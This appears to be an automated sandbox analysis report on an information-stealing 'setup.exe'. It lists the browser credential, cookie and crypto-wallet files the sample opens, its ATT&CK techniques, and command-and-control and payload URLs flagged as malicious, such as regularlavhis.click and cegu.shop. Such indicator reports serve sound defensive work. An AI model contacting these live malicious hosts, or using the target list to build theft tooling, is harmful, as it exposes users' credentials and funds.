              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\BPMLNOBVSB
              Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\FENIVHOIKN
              Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\NWTVCDUMOB
              Source: Yara match, File source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match, File source: Process Memory Space: setup.exe PID: 7468, type: MEMORYSTR
              Source: Yara match, File source: sslproxydump.pcap, type: PCAP
              Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matched signatures mapped to that technique)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: Windows Management Instrumentation (12); Native API (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Steganography; Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
              Credential Access: OS Credential Dumping (2); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (11); System Information Discovery (35); Security Software Discovery (251); Virtualization/Sandbox Evasion (21); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: Archive Collected Data (1); Data from Local System (51); Input Capture (1); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

              Antivirus detection for the submitted file (Source, Detection, Scanner, Label)
              setup.exe, 13%, ReversingLabs, Win32.Malware.Generic
              setup.exe, 10%, Virustotal
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://regularlavhis.click/VISc100%Avira URL Cloudmalware
              http://crl.microsoft6a0%Avira URL Cloudsafe
              https://regularlavhis.click/Mi100%Avira URL Cloudmalware
              https://regularlavhis.click/bu100%Avira URL Cloudmalware
              https://regularlavhis.click/api$100%Avira URL Cloudmalware
              https://regularlavhis.click/api100%Avira URL Cloudmalware
              https://regularlavhis.click/piGW100%Avira URL Cloudmalware
              https://regularlavhis.click/Y100%Avira URL Cloudmalware
              https://regularlavhis.click/jh100%Avira URL Cloudmalware
              https://regularlavhis.click/ob100%Avira URL Cloudmalware
              https://regularlavhis.click/apih100%Avira URL Cloudmalware
              https://regularlavhis.click/bub100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtf1100%Avira URL Cloudmalware
              https://regularlavhis.click/pi:100%Avira URL Cloudmalware
              https://regularlavhis.click/la100%Avira URL Cloudmalware
              https://regularlavhis.click/laK100%Avira URL Cloudmalware
              https://regularlavhis.click/pi100%Avira URL Cloudmalware
              regularlavhis.click100%Avira URL Cloudmalware
              https://regularlavhis.click/Mi6a100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtebKit/537.36100%Avira URL Cloudmalware
              http://multicommander.com/updates/version.xml0%Avira URL Cloudsafe
              https://regularlavhis.click/apiP100%Avira URL Cloudmalware
              https://regularlavhis.click/100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtk100%Avira URL Cloudmalware
              https://cegu.shop/2100%Avira URL Cloudmalware
              https://regularlavhis.click/jhP100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              185.161.251.21
              truefalse
                high
                regularlavhis.click
                104.21.96.1
                truetrue
                  unknown
Name | Malicious | Antivirus Detection | Reputation
https://regularlavhis.click/api | true | Avira URL Cloud: malware | unknown
rabidcowse.shop | false | (none) | high
wholersorie.shop | false | (none) | high
regularlavhis.click | true | Avira URL Cloud: malware | unknown
cloudewahsj.shop | false | (none) | high
noisycuttej.shop | false | (none) | high
nearycrepso.shop | false | (none) | high
https://cegu.shop/8574262446/ph.txt | false | (none) | high
framekgirus.shop | false | (none) | high
tirepublicerj.shop | false | (none) | high
abruptyopsn.shop | false | (none) | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://duckduckgo.com/ac/?q= | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/api$ | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.microsoft6a | setup.exe, 00000000.00000003.1942277987.000000000123E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://regularlavhis.click/Y | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.microsoft | setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/jh | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cegu.shop/ | setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://dfgh.online/invoker.php?compName= | setup.exe, 00000000.00000002.4141521913.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142246007.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2592829563.000000000121F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141655257.0000000001220000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142309121.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/Mi | setup.exe, 00000000.00000003.2593186194.000000000129D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141805946.000000000129D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/VISc | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.starfieldtech.com/0D | setup.exe | false | (none) | high
http://crl.thawte.com/ThawteTimestampingCA.crl0 | setup.exe | false | (none) | high
http://x1.c.lencr.org/0 | setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://x1.i.lencr.org/0 | setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | setup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/piGW | setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://regularlavhis.click/bu | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://regularlavhis.click/ob | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://klipvumisui.shop/int_clp_sha.txtf1 | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.starfieldtech.com/repository/sfsroot.crl0P | setup.exe | false | (none) | high
https://support.mozilla.org/products/firefoxgro.all | setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://klipvumisui.shop/int_clp_sha.txt | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/apih | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://regularlavhis.click/pi: | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/la | setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.thawte.com0 | setup.exe | false | (none) | high
https://regularlavhis.click/bub | setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://ocsp.rootca1.amazontrust.com0: | setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/pi | setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://regularlavhis.click/laK | setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://certificates.starfieldtech.com/repository/1604 | setup.exe | false | (none) | high
